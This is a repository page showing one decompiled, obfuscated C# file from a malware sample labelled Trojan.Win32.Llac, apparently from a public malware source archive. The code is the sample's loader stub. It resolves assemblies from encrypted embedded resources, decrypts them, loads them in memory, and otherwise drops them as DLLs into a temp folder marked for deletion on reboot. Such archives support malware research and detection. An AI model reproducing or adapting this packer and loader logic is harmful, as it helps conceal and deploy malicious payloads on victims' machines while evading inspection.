ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2/_0004/_0002.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

297 lines
8.6 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: 18A6455A-DBC9-4D4B-8699-BEBEFCABEF8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2.exe
using \u0004;
using System;
using System.Collections;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0004
{
internal sealed class \u0002
{
private static Hashtable \u0001 = new Hashtable();
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0002([In] string obj0, [In] string obj1, [In] int obj2);
internal static void \u0002()
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0002);
}
catch
{
}
}
internal static Assembly \u0002([In] object obj0, [In] ResolveEventArgs obj1)
{
\u0002.\u0001 obj = new \u0002.\u0001(obj1.Name);
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0002(false)));
string[] strArray;
string str1;
bool flag1;
bool flag2;
int index1;
if (true)
{
strArray = "ezM4N2FlOTAzLTM0M2EtNGY2Yi04OWUyLTNmNDhlM2IyZTk5MH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{387ae903-343a-4f6b-89e2-3f48e3b2e990},e2NhYzI5NzkzLTkzYWUtNDlkNy1iYjhkLWMzZmUzNDliNjAzOX0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{cac29793-93ae-49d7-bb8d-c3fe349b6039},ezNlYTM2NTc0LWEyYzYtNDRiMC04N2U2LWQ1NWQzNzE1MGY5OH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{3ea36574-a2c6-44b0-87e6-d55d37150f98}".Split(',');
str1 = string.Empty;
flag1 = false;
flag2 = false;
index1 = 0;
goto label_6;
}
else
goto label_18;
label_3:
int num1;
if (num1 != 0)
{
str1 = strArray[index1 + 1];
goto label_9;
}
else
index1 += 2;
label_6:
int num2 = index1;
int num3 = strArray.Length;
int num4 = num2;
label_7:
int num5 = num3 - 1;
label_8:
if (num4 < num5)
{
num1 = strArray[index1] == base64String ? 1 : 0;
goto label_3;
}
label_9:
if (str1.Length == 0 && obj.\u0003.Length == 0)
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
else
goto label_16;
label_11:
for (int index2 = 0; index2 < strArray.Length - 1; index2 += 2)
{
if (strArray[index2] == base64String)
{
str1 = strArray[index2 + 1];
break;
}
}
label_16:
if (true)
{
if (str1.Length <= 0)
goto label_43;
}
else
goto label_11;
label_18:
num4 = (int) str1[0];
num3 = 3;
if (num3 != 0)
{
if (num3 == 0)
{
num1 = num4;
goto label_3;
}
else
{
if (num4 == 91)
{
int num6 = str1.IndexOf(']');
string str2 = str1.Substring(1, num6 - 1);
int num7 = str2.IndexOf('z');
int num8 = 0;
if (num8 != 0)
{
num5 = num8;
num4 = num7;
goto label_8;
}
else
{
flag1 = num7 >= num8;
flag2 = str2.IndexOf('t') >= 0;
str1 = str1.Substring(num6 + 1);
}
}
lock (\u0002.\u0001)
{
label_25:
int num9;
for (int index3 = \u0002.\u0001.ContainsKey((object) str1) ? 1 : 0; index3 == 0; index3 = num9)
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = \u0003.\u0003.\u0002(numArray);
Assembly assembly;
do
{
assembly = (Assembly) null;
if (!flag2)
{
try
{
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag2 = true;
}
catch (BadImageFormatException ex)
{
flag2 = true;
}
}
if (flag2)
{
try
{
string path1 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
Directory.CreateDirectory(path1);
string path2 = path1 + obj.\u0001 + ".dll";
if (!File.Exists(path2))
{
FileStream fileStream = File.OpenWrite(path2);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
\u0002.\u0002(path2, (string) null, 4);
\u0002.\u0002(path1, (string) null, 4);
}
assembly = Assembly.LoadFile(path2);
}
catch
{
}
}
num9 = 8;
if (num9 == 0)
goto label_25;
}
while (num9 == 0);
\u0002.\u0001[(object) str1] = (object) assembly;
return assembly;
}
goto label_43;
}
return (Assembly) \u0002.\u0001[(object) str1];
}
}
}
else
goto label_7;
label_43:
if (true)
return (Assembly) null;
goto label_9;
}
internal struct \u0001
{
public string \u0001;
public Version \u0001;
public string \u0002;
public string \u0003;
public string \u0002([In] bool obj0)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.\u0001);
label_11:
int num1 = obj0 ? 1 : 0;
while (true)
{
if (num1 != 0)
{
int num2 = this.\u0001 != (Version) null ? 1 : 0;
if (false)
num1 = num2;
else if (num2 == 0)
goto label_4;
else
goto label_13;
}
else
goto label_4;
}
goto label_5;
label_4:
stringBuilder.Append(", Culture=");
num1 = 0;
label_5:
if (num1 == 0)
{
while (true)
{
if (true)
{
if (true)
{
stringBuilder.Append(this.\u0002.Length == 0 ? "neutral" : this.\u0002);
stringBuilder.Append(", PublicKeyToken=");
stringBuilder.Append(this.\u0003.Length == 0 ? "null" : this.\u0003);
goto label_10;
}
else
goto label_11;
}
}
goto label_13;
}
label_10:
return stringBuilder.ToString();
label_13:
stringBuilder.Append(", Version=");
stringBuilder.Append((object) this.\u0001);
goto label_4;
}
public \u0001([In] string obj0)
{
this.\u0001 = (Version) null;
this.\u0002 = string.Empty;
this.\u0003 = string.Empty;
this.\u0001 = string.Empty;
string str1 = obj0;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith("Version="))
this.\u0001 = new Version(str3.Substring(8));
else if (str3.StartsWith("Culture="))
{
this.\u0002 = str3.Substring(8);
if (this.\u0002 == "neutral")
this.\u0002 = string.Empty;
}
else if (str3.StartsWith("PublicKeyToken="))
{
this.\u0003 = str3.Substring(15);
if (this.\u0003 == "null")
this.\u0003 = string.Empty;
}
else
this.\u0001 = str3;
}
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink